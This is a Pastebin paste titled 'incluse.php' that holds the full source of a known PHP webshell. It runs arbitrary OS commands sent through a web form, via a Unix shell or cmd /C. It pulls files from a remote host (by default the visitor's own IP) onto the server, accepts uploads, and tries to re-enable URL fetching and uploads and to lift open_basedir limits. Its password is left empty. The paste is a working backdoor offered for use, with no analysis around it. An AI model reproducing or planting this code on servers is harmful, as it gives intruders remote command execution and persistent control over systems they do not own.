MRC

incluse.php

MRC
Jun 13th, 2020
583
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.32 KB | None | 0 0
  1. <?php
  2. /*******************************************************************************
  3.  * Copyright 2017 WhiteWinterWolf
  4.  * https://www.whitewinterwolf.com/tags/php-webshell/
  5.  *
  6.  * This file is part of wwolf-php-webshell.
  7.  *
  8.  * wwwolf-php-webshell is free software: you can redistribute it and/or modify
  9.  * it under the terms of the GNU General Public License as published by
  10.  * the Free Software Foundation, either version 3 of the License, or
  11.  * (at your option) any later version.
  12.  *
  13.  * This program is distributed in the hope that it will be useful,
  14.  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  15.  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  16.  * GNU General Public License for more details.
  17.  *
  18.  * You should have received a copy of the GNU General Public License
  19.  * along with this program.  If not, see <http://www.gnu.org/licenses/>.
  20.  ******************************************************************************/
  21.  
  22. /*
  23.  * Optional password settings.
  24.  * Use the 'passhash.sh' script to generate the hash.
  25.  * NOTE: the prompt value is tied to the hash!
  26.  */
  27. $passprompt = "WhiteWinterWolf's PHP webshell: ";
  28. $passhash = "";
  29.  
  30. function e($s) { echo htmlspecialchars($s, ENT_QUOTES); }
  31.  
  32. function h($s)
  33. {
  34.     global $passprompt;
  35.     if (function_exists('hash_hmac'))
  36.     {
  37.         return hash_hmac('sha256', $s, $passprompt);
  38.     }
  39.     else
  40.     {
  41.         return bin2hex(mhash(MHASH_SHA256, $s, $passprompt));
  42.     }
  43. }
  44.  
  45. function fetch_fopen($host, $port, $src, $dst)
  46. {
  47.     global $err, $ok;
  48.     $ret = '';
  49.     if (strpos($host, '://') === false)
  50.     {
  51.         $host = 'http://' . $host;
  52.     }
  53.     else
  54.     {
  55.         $host = str_replace(array('ssl://', 'tls://'), 'https://', $host);
  56.     }
  57.     $rh = fopen("${host}:${port}${src}", 'rb');
  58.     if ($rh !== false)
  59.     {
  60.         $wh = fopen($dst, 'wb');
  61.         if ($wh !== false)
  62.         {
  63.             $cbytes = 0;
  64.             while (! feof($rh))
  65.             {
  66.                 $cbytes += fwrite($wh, fread($rh, 1024));
  67.             }
  68.             fclose($wh);
  69.             $ret .= "${ok} Fetched file <i>${dst}</i> (${cbytes} bytes)<br />";
  70.         }
  71.         else
  72.         {
  73.             $ret .= "${err} Failed to open file <i>${dst}</i><br />";
  74.         }
  75.         fclose($rh);
  76.     }
  77.     else
  78.     {
  79.         $ret = "${err} Failed to open URL <i>${host}:${port}${src}</i><br />";
  80.     }
  81.     return $ret;
  82. }
  83.  
  84. function fetch_sock($host, $port, $src, $dst)
  85. {
  86.     global $err, $ok;
  87.     $ret = '';
  88.     $host = str_replace('https://', 'tls://', $host);
  89.     $s = fsockopen($host, $port);
  90.     if ($s)
  91.     {
  92.         $f = fopen($dst, 'wb');
  93.         if ($f)
  94.         {
  95.             $buf = '';
  96.             $r = array($s);
  97.             $w = NULL;
  98.             $e = NULL;
  99.             fwrite($s, "GET ${src} HTTP/1.0\r\n\r\n");
  100.             while (stream_select($r, $w, $e, 5) && !feof($s))
  101.             {
  102.                 $buf .= fread($s, 1024);
  103.             }
  104.             $buf = substr($buf, strpos($buf, "\r\n\r\n") + 4);
  105.             fwrite($f, $buf);
  106.             fclose($f);
  107.             $ret .= "${ok} Fetched file <i>${dst}</i> (" . strlen($buf) . " bytes)<br />";
  108.         }
  109.         else
  110.         {
  111.             $ret .= "${err} Failed to open file <i>${dst}</i><br />";
  112.         }
  113.         fclose($s);
  114.     }
  115.     else
  116.     {
  117.         $ret .= "${err} Failed to connect to <i>${host}:${port}</i><br />";
  118.     }
  119.     return $ret;
  120. }
  121.  
  122. ini_set('log_errors', '0');
  123. ini_set('display_errors', '1');
  124. error_reporting(E_ALL);
  125.  
  126. while (@ ob_end_clean());
  127.  
  128. if (! isset($_SERVER))
  129. {
  130.     global $HTTP_POST_FILES, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
  131.     $_FILES = &$HTTP_POST_FILES;
  132.     $_POST = &$HTTP_POST_VARS;
  133.     $_SERVER = &$HTTP_SERVER_VARS;
  134. }
  135.  
  136. $auth = '';
  137. $cmd = empty($_POST['cmd']) ? '' : $_POST['cmd'];
  138. $cwd = empty($_POST['cwd']) ? getcwd() : $_POST['cwd'];
  139. $fetch_func = 'fetch_fopen';
  140. $fetch_host = empty($_POST['fetch_host']) ? $_SERVER['REMOTE_ADDR'] : $_POST['fetch_host'];
  141. $fetch_path = empty($_POST['fetch_path']) ? '' : $_POST['fetch_path'];
  142. $fetch_port = empty($_POST['fetch_port']) ? '80' : $_POST['fetch_port'];
  143. $pass = empty($_POST['pass']) ? '' : $_POST['pass'];
  144. $url = $_SERVER['REQUEST_URI'];
  145. $status = '';
  146. $ok = '&#9786; :';
  147. $warn = '&#9888; :';
  148. $err = '&#9785; :';
  149.  
  150. if (! empty($passhash))
  151. {
  152.     if (function_exists('hash_hmac') || function_exists('mhash'))
  153.     {
  154.         $auth = empty($_POST['auth']) ? h($pass) : $_POST['auth'];
  155.         if (h($auth) !== $passhash)
  156.         {
  157.             ?>
  158.                 <form method="post" action="<?php e($url); ?>">
  159.                     <?php e($passprompt); ?>
  160.                     <input type="password" size="15" name="pass">
  161.                     <input type="submit" value="Send">
  162.                 </form>
  163.             <?php
  164.             exit;
  165.         }
  166.     }
  167.     else
  168.     {
  169.         $status .= "${warn} Authentication disabled ('mhash()' missing).<br />";
  170.     }
  171. }
  172.  
  173. if (! ini_get('allow_url_fopen'))
  174. {
  175.     ini_set('allow_url_fopen', '1');
  176.     if (! ini_get('allow_url_fopen'))
  177.     {
  178.         if (function_exists('stream_select'))
  179.         {
  180.             $fetch_func = 'fetch_sock';
  181.         }
  182.         else
  183.         {
  184.             $fetch_func = '';
  185.             $status .= "${warn} File fetching disabled ('allow_url_fopen'"
  186.                 . " disabled and 'stream_select()' missing).<br />";
  187.         }
  188.     }
  189. }
  190. if (! ini_get('file_uploads'))
  191. {
  192.     ini_set('file_uploads', '1');
  193.     if (! ini_get('file_uploads'))
  194.     {
  195.         $status .= "${warn} File uploads disabled.<br />";
  196.     }
  197. }
  198. if (ini_get('open_basedir') && ! ini_set('open_basedir', ''))
  199. {
  200.     $status .= "${warn} open_basedir = " . ini_get('open_basedir') . "<br />";
  201. }
  202.  
  203. if (! chdir($cwd))
  204. {
  205.   $cwd = getcwd();
  206. }
  207.  
  208. if (! empty($fetch_func) && ! empty($fetch_path))
  209. {
  210.     $dst = $cwd . DIRECTORY_SEPARATOR . basename($fetch_path);
  211.     $status .= $fetch_func($fetch_host, $fetch_port, $fetch_path, $dst);
  212. }
  213.  
  214. if (ini_get('file_uploads') && ! empty($_FILES['upload']))
  215. {
  216.     $dest = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);
  217.     if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest))
  218.     {
  219.         $status .= "${ok} Uploaded file <i>${dest}</i> (" . $_FILES['upload']['size'] . " bytes)<br />";
  220.     }
  221. }
  222. ?>
  223.  
  224. <form method="post" action="<?php e($url); ?>"
  225.     <?php if (ini_get('file_uploads')): ?>
  226.         enctype="multipart/form-data"
  227.     <?php endif; ?>
  228.     >
  229.     <?php if (! empty($passhash)): ?>
  230.         <input type="hidden" name="auth" value="<?php e($auth); ?>">
  231.     <?php endif; ?>
  232.     <table border="0">
  233.         <?php if (! empty($fetch_func)): ?>
  234.             <tr><td>
  235.                 <b>Fetch:</b>
  236.             </td><td>
  237.                 host: <input type="text" size="15" id="fetch_host" name="fetch_host" value="<?php e($fetch_host); ?>">
  238.                 port: <input type="text" size="4" id="fetch_port" name="fetch_port" value="<?php e($fetch_port); ?>">
  239.                 path: <input type="text" size="40" id="fetch_path" name="fetch_path" value="">
  240.             </td></tr>
  241.         <?php endif; ?>
  242.         <tr><td>
  243.             <b>CWD:</b>
  244.         </td><td>
  245.             <input type="text" size="50" id="cwd" name="cwd" value="<?php e($cwd); ?>">
  246.             <?php if (ini_get('file_uploads')): ?>
  247.                 <b>Upload:</b> <input type="file" id="upload" name="upload">
  248.             <?php endif; ?>
  249.         </td></tr>
  250.         <tr><td>
  251.             <b>Cmd:</b>
  252.         </td><td>
  253.             <input type="text" size="80" id="cmd" name="cmd" value="<?php e($cmd); ?>">
  254.         </td></tr>
  255.         <tr><td>
  256.         </td><td>
  257.             <sup><a href="#" onclick="cmd.value=''; cmd.focus(); return false;">Clear cmd</a></sup>
  258.         </td></tr>
  259.         <tr><td colspan="2" style="text-align: center;">
  260.             <input type="submit" value="Execute" style="text-align: right;">
  261.         </td></tr>
  262.     </table>
  263.    
  264. </form>
  265. <hr />
  266.  
  267. <?php
  268. if (! empty($status))
  269. {
  270.     echo "<p>${status}</p>";
  271. }
  272.  
  273. echo "<pre>";
  274. if (! empty($cmd))
  275. {
  276.     echo "<b>";
  277.     e($cmd);
  278.     echo "</b>\n";
  279.     if (DIRECTORY_SEPARATOR == '/')
  280.     {
  281.         $p = popen('exec 2>&1; ' . $cmd, 'r');
  282.     }
  283.     else
  284.     {
  285.         $p = popen('cmd /C "' . $cmd . '" 2>&1', 'r');
  286.     }
  287.     while (! feof($p))
  288.     {
  289.         echo htmlspecialchars(fread($p, 4096), ENT_QUOTES);
  290.         @ flush();
  291.     }
  292. }
  293. echo "</pre>";
  294.  
  295. exit;
  296. ?>
Add Comment
Please, Sign In to add comment